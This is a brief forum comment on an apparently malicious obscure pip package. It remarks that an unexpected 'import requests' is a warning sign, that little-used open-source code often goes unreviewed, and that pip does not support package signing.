|
|
|
|
|
|
by parliament32
2962 days ago
|
|
|
The module starts with "import requests" which should be a red flag even for a cause skim of the source. The "it's open source, I'm sure someone else read over it" excuse only works when the code is popular enough... and some obscure pip package definitely isn't. The author of the package claims to be a "victim" here, but it's hard to tell. Too bad pip doesn't support package signing. |
|
|